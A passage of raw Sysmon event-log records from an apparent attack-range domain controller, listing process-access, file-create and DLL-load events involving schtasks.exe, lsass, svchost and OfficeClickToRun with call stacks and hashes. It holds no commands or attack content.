Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.436{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDA-607E-C70C-00000000BB01}4472C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.421{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.405{A7A01FEF-EBDA-607E-C80C-00000000BB01}37685848C:\Windows\system32\conhost.exe{A7A01FEF-EBDA-607E-C70C-00000000BB01}4472C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.405{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.405{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-140.datMD5=90FDC3489B276FD248001210D69A47D0,SHA256=5D9CEEE05FC0612179E4D01866EA049585B8B33E896503230323C6563FCBAFB5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.389{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-C80C-00000000BB01}3768C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.389{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.389{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.374{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-C70C-00000000BB01}4472C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.374{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923308C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDA-607E-C70C-00000000BB01}4472C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+395356|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a81f4|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+434879|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+434cc5|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+47afbb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.374{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-C40C-00000000BB01}5708C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.374{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-C40C-00000000BB01}5708C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.374{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.358{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.358{A7A01FEF-EBDA-607E-C40C-00000000BB01}5708C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.358{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.342{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.342{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDA-607E-C40C-00000000BB01}5708C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.342{A7A01FEF-EBCF-607E-C10B-00000000BB01}3984436C:\Windows\system32\conhost.exe{A7A01FEF-EBDA-607E-C60C-00000000BB01}3512C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.342{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-C60C-00000000BB01}3512C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.342{A7A01FEF-EBCF-607E-BE0B-00000000BB01}68565768C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe{A7A01FEF-EBDA-607E-C60C-00000000BB01}3512C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.DLL+3d7ae(wow64)|UNKNOWN(0000000001904853)|UNKNOWN(0000000001904504)|UNKNOWN(00000000019052ED)|UNKNOWN(0000000001902845)|UNKNOWN(0000000001900F66)|UNKNOWN(0000000001900950)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+f036(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+122da(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+1859b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+1992d7(wow64) 10341000x800000000000000074656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.342{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.327{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.327{A7A01FEF-EBDA-607E-C50C-00000000BB01}43406936C:\Windows\system32\conhost.exe{A7A01FEF-EBDA-607E-C40C-00000000BB01}5708C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.327{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-78.datMD5=381B5214716C4E3A35B7DE9BCB517E1A,SHA256=4B68BB0EE396AA26C68EAA246559D76F11C7FC1173DAF431124C09B6AE93144C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.327{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.327{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.311{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-C50C-00000000BB01}4340C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.311{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.311{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-C40C-00000000BB01}5708C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923308C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDA-607E-C40C-00000000BB01}5708C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+39526d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a8320|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+434c5f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+47afbb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.296{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.296{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-C20C-00000000BB01}6524C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.296{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-C20C-00000000BB01}6524C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.296{A7A01FEF-EBDA-607E-C20C-00000000BB01}6524C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft 